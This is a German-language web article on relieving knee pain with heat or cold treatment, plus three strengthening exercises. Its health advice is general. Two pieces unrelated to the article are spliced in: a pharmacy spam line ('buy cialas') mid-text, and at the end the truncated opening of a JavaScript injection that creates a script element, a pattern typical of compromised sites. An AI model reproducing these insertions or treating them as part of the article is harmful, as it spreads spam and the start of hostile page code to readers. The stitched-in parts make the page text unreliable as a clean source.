Knieschmerzen mit Hilfe von Wärme oder Kälte verringern

Der Einsatz von Kälte und Wärme kann eine effektive und zugleich unkomplizierte Möglichkeit sein, Knieschmerzen zu lindern. Die Ursache ist ausschlaggebend, um zu entscheiden, ob Kälte oder Wärme notwendig ist. Beschwerden können durch den Einsatz von Kälte- oder Wärmebehandlungen nachweislich verringert werden. Kälte wirkt bei bestehenden Entzündungen lindernd. Eine Wärmebehandlung hingegen eignet sich, wenn der Sauerstofftransport erhöht werden soll und „Abfallprodukte“ leichter abtransportiert werden soll.

buy cialas

Wärme

Eis

Schmerzen (allgemeine und chronische)

Ungefähr zwanzig Minuten vor einer Trainingseinheit

Ungefähr zwanzig Minuten nach einer Trainingseinheit

Verletzungen

24 Std. nach kleineren Verletzungen oder 48 Std. nach gravierenden Verletzungen können 20 Minuten Wärme lindernd wirken.

Innerhalb von 24 Std. oder 48 Std. nach dem Auftreten der ersten Symptome, kann ein Kühlen der betroffenen Stelle von 20 Minuten eine Linderung erzielt werden.

Ein mehrmaliges Wiederholen ist empfehlenswert.

Anwendung

Das Wärmekissen auf der betroffenen Stelle platzieren. Es ist wichtig keinen Druck während der Wärmebehandlung auszuüben.

Ein dünnes Handtuch sollte sich zwischen dem Eis und der Haut befinden, um Unterkühlungen vorzubeugen.

Ein Massieren der betroffenen Stelle mit einem Eiswürfel kann ebenfalls lindernd wirken und ist unter der Bezeichnung  Eismassage bekannt.

Vorsichtsmaßnahmen

Bei Schürf- und Schnittwunden (offenen Verletzungen) wird von einer Behandlung abgeraten

Um Frostbeulen vorzubeugen ist das Abdecken der Haut mit einem dünnen Tuch unumgänglich.

 

Kräftigende Übungen bei Knieschmerzen

Übung 1:

Der Körper wird auf die Seite gelegt und Rücken, Beine und Gesäß für eine Stabilisierung an die Wand gelehnt. Die seitliche Hüftmuskulatur wird gezielt angespannt, indem das obere Bein langsam angehoben wird. Der Spreizwinkel sollte ungefähr dreißig Grad betragen und mehrere Sekunden gehalten werden. Nach mehreren Sekunden wird das angewinkelte Bein wieder langsam gesenkt. Diese Übung sollte zehn bis zwanzig Mal ausgeführt werden, um eine optimale Kräftigung zu erzielen.

Übung 2:

Zur Kontrolle der Körperhaltung empfiehlt es sich, sich für diese Übung vor einen Spiegel zu stellen. Zu Beginn dieser Übung wird nur ein Bein gebeugt (einbeinige Kniebeuge) und die Hüften parallel gehalten. Das schmerzende Knie wird in einem Dreißig- Grad-Winkel gerade nach vorne gezeigt. Diese Übung sollte drei Mal in der Woche bis zu zwanzig Mal pro Trainingseinheit wiederholt werden.

Übung 3:

Das verletzte Bein wird auf eine Stufe gestellt, wobei eine seitliche Haltung eingenommen wird. Das gesunde Bein „hängt“ locker von der Stufe herunter und beide Beine bleiben durchgestreckt. Für eine Stabilisierung kann es dienlich sein, sich an der Wand abzustützen. Die Hüfte wird langsam auf das herabhängende unbelastete Bein gesenkt. Das Körpergewicht wird auf die Innenseite des auf der Stufe platziertem Standfußes. Anschließend wird die Ausgangsposition wieder eingenommen, um diese Übung bis zu zwanzig Mal zu wiederholen.

Übungen können mit Hilfe des Internets und Zeitschriften in unzähligen Ausführungen gefunden werden. Doch für eine effektive und dauerhafte Reduzierung von Knieschmerzen ist der Rat eines Experten empfehlenswert. Ein Experte kann die Ursachen für die schmerzenden Gelenke diagnostizieren und gezielt Übungen und Therapiemaßnahmen empfehlen. Eine Steigerung der täglichen Bewegung in Form von Fahrradfahren oder Dehnungsübungen kann nachweislich auch chronische Knieschmerzen lindern. Bei Übergewicht kann eine Verringerung des Gewichtes die Belastung, die auf die Gelenke lastet, verringert werden, was wiederum Knieschmerzen lindern kann.


var d=document;var s=d.createElement(’script‘);